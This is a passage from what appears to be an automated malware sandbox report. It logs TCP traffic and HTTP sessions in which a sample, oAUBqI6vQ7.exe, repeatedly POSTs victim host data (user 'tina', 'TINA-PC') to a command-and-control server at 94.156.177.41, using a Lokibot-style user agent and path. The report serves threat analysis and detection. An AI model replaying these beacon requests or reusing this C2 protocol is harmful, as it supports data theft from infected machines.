Jan 10, 2025 23:40:42.346241951 CET	80	50059	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:42.481847048 CET	50060	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:42.486643076 CET	80	50060	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:42.486717939 CET	50060	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:42.488850117 CET	50060	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:42.493603945 CET	80	50060	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:42.493662119 CET	50060	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:42.498512030 CET	80	50060	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:43.231003046 CET	80	50060	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:43.231137037 CET	50060	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:43.231146097 CET	80	50060	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:43.231184959 CET	50060	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:43.235959053 CET	80	50060	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:43.375628948 CET	50061	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:43.380466938 CET	80	50061	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:43.380557060 CET	50061	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:43.382637978 CET	50061	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:43.387458086 CET	80	50061	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:43.387530088 CET	50061	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:43.392384052 CET	80	50061	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:44.110176086 CET	80	50061	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:44.110256910 CET	80	50061	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:44.110313892 CET	50061	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:44.114253044 CET	50061	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:44.115192890 CET	80	50061	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:44.252636909 CET	50062	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:44.260526896 CET	80	50062	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:44.262866020 CET	50062	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:44.262866020 CET	50062	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:44.267759085 CET	80	50062	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:44.267924070 CET	50062	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:44.272741079 CET	80	50062	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:44.984807014 CET	80	50062	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:44.984838009 CET	80	50062	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:44.984977961 CET	50062	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:45.037285089 CET	50062	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:45.042289019 CET	80	50062	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:45.480844975 CET	50063	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:45.485676050 CET	80	50063	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:45.485742092 CET	50063	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:45.488189936 CET	50063	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:45.492954016 CET	80	50063	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:45.492997885 CET	50063	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:45.497769117 CET	80	50063	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:46.211401939 CET	80	50063	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:46.211421967 CET	80	50063	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:46.211611032 CET	50063	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:46.211699009 CET	50063	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:46.216449976 CET	80	50063	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:46.361248016 CET	50064	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:46.367945910 CET	80	50064	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:46.368369102 CET	50064	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:46.372221947 CET	50064	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:46.378956079 CET	80	50064	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:46.379070044 CET	50064	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:46.385507107 CET	80	50064	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:47.089814901 CET	80	50064	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:47.089853048 CET	80	50064	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:47.089895964 CET	50064	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:47.089939117 CET	50064	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:47.094778061 CET	80	50064	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:47.265660048 CET	50065	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:47.270597935 CET	80	50065	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:47.270693064 CET	50065	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:47.272799015 CET	50065	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:47.277714014 CET	80	50065	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:47.277777910 CET	50065	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:47.282815933 CET	80	50065	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:47.997868061 CET	80	50065	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:47.998019934 CET	80	50065	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:47.998043060 CET	50065	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:47.998068094 CET	50065	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:48.002835989 CET	80	50065	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:48.278865099 CET	50066	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:48.286313057 CET	80	50066	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:48.286396027 CET	50066	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:48.288489103 CET	50066	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:48.293262005 CET	80	50066	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:48.293317080 CET	50066	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:48.298115969 CET	80	50066	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:49.004328012 CET	80	50066	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:49.004404068 CET	80	50066	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:49.004508018 CET	50066	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:49.004750967 CET	50066	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:49.009475946 CET	80	50066	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:49.153831005 CET	50067	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:49.158699036 CET	80	50067	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:49.158845901 CET	50067	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:49.160940886 CET	50067	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:49.165740013 CET	80	50067	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:49.166291952 CET	50067	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:49.171327114 CET	80	50067	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:49.867835999 CET	80	50067	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:49.867990017 CET	80	50067	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:49.868093967 CET	50067	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:49.868172884 CET	50067	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:49.872924089 CET	80	50067	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:50.019001961 CET	50068	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:50.024169922 CET	80	50068	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:50.024276972 CET	50068	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:50.026371002 CET	50068	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:50.031274080 CET	80	50068	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:50.031342983 CET	50068	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:50.036184072 CET	80	50068	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:50.722242117 CET	80	50068	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:50.722362995 CET	80	50068	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:50.722392082 CET	50068	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:50.722439051 CET	50068	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:50.727222919 CET	80	50068	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:50.870965958 CET	50069	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:50.875948906 CET	80	50069	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:50.876077890 CET	50069	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:50.878226042 CET	50069	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:50.883122921 CET	80	50069	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:50.883229017 CET	50069	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:50.888017893 CET	80	50069	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:51.592248917 CET	80	50069	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:51.592269897 CET	80	50069	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:51.592375994 CET	50069	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:51.592423916 CET	50069	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:51.597340107 CET	80	50069	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:51.732256889 CET	50070	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:51.737188101 CET	80	50070	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:51.737263918 CET	50070	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:51.739484072 CET	50070	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:51.744299889 CET	80	50070	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:51.744359970 CET	50070	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:51.749185085 CET	80	50070	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:52.428802013 CET	80	50070	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:52.428848982 CET	80	50070	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:52.429019928 CET	50070	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:52.429208994 CET	50070	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:52.433968067 CET	80	50070	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:52.576131105 CET	50071	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:52.581012011 CET	80	50071	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:52.581104040 CET	50071	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:52.583261013 CET	50071	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:52.588171959 CET	80	50071	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:52.588350058 CET	50071	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:52.593157053 CET	80	50071	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:53.286833048 CET	80	50071	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:53.286900043 CET	80	50071	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:53.287062883 CET	50071	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:53.287062883 CET	50071	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:53.291878939 CET	80	50071	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:53.438014030 CET	50072	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:53.442838907 CET	80	50072	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:53.442930937 CET	50072	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:53.445018053 CET	50072	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:53.449918985 CET	80	50072	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:53.449990988 CET	50072	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:53.454838037 CET	80	50072	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:54.256181002 CET	80	50072	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:54.256208897 CET	80	50072	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:54.256299019 CET	50072	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:54.256393909 CET	80	50072	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:54.256505966 CET	50072	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:54.256505966 CET	50072	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:54.261264086 CET	80	50072	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:54.427337885 CET	50073	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:54.432215929 CET	80	50073	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:54.432291031 CET	50073	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:54.434813976 CET	50073	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:54.439631939 CET	80	50073	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:54.439683914 CET	50073	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:54.444439888 CET	80	50073	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:55.149559021 CET	80	50073	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:55.149707079 CET	50073	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:55.149835110 CET	80	50073	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:55.149878025 CET	50073	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:55.154519081 CET	80	50073	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:55.304289103 CET	50074	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:55.309084892 CET	80	50074	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:55.309302092 CET	50074	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:55.311760902 CET	50074	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:55.316543102 CET	80	50074	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:55.316603899 CET	50074	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:55.321432114 CET	80	50074	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:56.057795048 CET	80	50074	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:56.057817936 CET	80	50074	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:56.057969093 CET	50074	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:56.060621977 CET	50074	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:56.065478086 CET	80	50074	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:56.198539972 CET	50075	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:56.203691959 CET	80	50075	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:56.203771114 CET	50075	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:56.205900908 CET	50075	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:56.210690022 CET	80	50075	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:56.210746050 CET	50075	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:56.215529919 CET	80	50075	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:56.939388037 CET	80	50075	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:56.939408064 CET	80	50075	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:56.939599037 CET	50075	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:56.940263033 CET	50075	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:56.945046902 CET	80	50075	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:57.146203995 CET	50076	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:57.151138067 CET	80	50076	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:57.151225090 CET	50076	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:57.153563976 CET	50076	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:57.158370018 CET	80	50076	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:57.158428907 CET	50076	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:57.163192987 CET	80	50076	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:57.853509903 CET	80	50076	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:57.853585958 CET	80	50076	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:57.853599072 CET	50076	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:57.853632927 CET	50076	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:57.858397961 CET	80	50076	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:58.038223982 CET	50077	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:58.043181896 CET	80	50077	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:58.043346882 CET	50077	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:58.045705080 CET	50077	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:58.050559998 CET	80	50077	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:58.050720930 CET	50077	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:58.055565119 CET	80	50077	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:58.781198025 CET	80	50077	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:58.781359911 CET	80	50077	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:58.781455994 CET	50077	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:58.781455994 CET	50077	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:58.786257029 CET	80	50077	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:58.924813986 CET	50078	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:58.929686069 CET	80	50078	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:58.929765940 CET	50078	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:58.932216883 CET	50078	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:58.937021971 CET	80	50078	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:58.937067986 CET	50078	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:58.941874981 CET	80	50078	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:59.653239012 CET	80	50078	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:59.653347969 CET	80	50078	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:59.653369904 CET	50078	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:59.653399944 CET	50078	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:59.658195019 CET	80	50078	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:59.842700005 CET	50079	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:59.847469091 CET	80	50079	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:59.847616911 CET	50079	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:59.850042105 CET	50079	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:59.854780912 CET	80	50079	94.156.177.41	192.168.2.9
Jan 10, 2025 23:40:59.854825020 CET	50079	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:40:59.859576941 CET	80	50079	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:00.555465937 CET	80	50079	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:00.555535078 CET	80	50079	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:00.555619001 CET	50079	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:00.556736946 CET	50079	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:00.561480045 CET	80	50079	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:00.697906971 CET	50080	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:00.702795029 CET	80	50080	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:00.702892065 CET	50080	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:00.705025911 CET	50080	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:00.709814072 CET	80	50080	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:00.709875107 CET	50080	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:00.714728117 CET	80	50080	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:01.438971043 CET	80	50080	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:01.439090014 CET	80	50080	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:01.439250946 CET	50080	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:01.439429045 CET	50080	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:01.444242001 CET	80	50080	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:01.600003958 CET	50081	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:01.604975939 CET	80	50081	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:01.605051041 CET	50081	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:01.607443094 CET	50081	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:01.612171888 CET	80	50081	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:01.612215996 CET	50081	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:01.616960049 CET	80	50081	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:02.325126886 CET	80	50081	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:02.325217009 CET	80	50081	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:02.325274944 CET	50081	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:02.326148033 CET	50081	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:02.330867052 CET	80	50081	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:02.599863052 CET	50082	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:02.604662895 CET	80	50082	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:02.604724884 CET	50082	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:02.606862068 CET	50082	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:02.611676931 CET	80	50082	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:02.611716986 CET	50082	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:41:02.616466045 CET	80	50082	94.156.177.41	192.168.2.9
Jan 10, 2025 23:41:02.816240072 CET	50082	80	192.168.2.9	94.156.177.41

HTTP Request Dependency Graph

94.156.177.41

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49775	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:30.028404951 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 172 Connection: close
Jan 10, 2025 23:39:30.033216953 CET	172	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: 'ckav.rutina305090TINA-PCk0FDD42EE188E931437F4FBE2CES5iE
Jan 10, 2025 23:39:30.747435093 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49782	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:30.978722095 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 172 Connection: close
Jan 10, 2025 23:39:30.983573914 CET	172	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: 'ckav.rutina305090TINA-PC+0FDD42EE188E931437F4FBE2CQEDtm
Jan 10, 2025 23:39:31.697825909 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49789	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:31.781302929 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:31.786335945 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:32.526202917 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49795	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 23:39:32.758107901 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 145 Connection: close
Jan 10, 2025 23:39:32.762985945 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 33 00 30 00 35 00 30 00 39 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina305090TINA-PC0FDD42EE188E931437F4FBE2C
Jan 10, 2025 23:39:33.496758938 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 10 Jan 2025 22:39:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49802	94.156.177.41	80	8120	C:\Users\user\Desktop\oAUBqI6vQ7.exe

Timestamp	Bytes transferred	Direction	Data
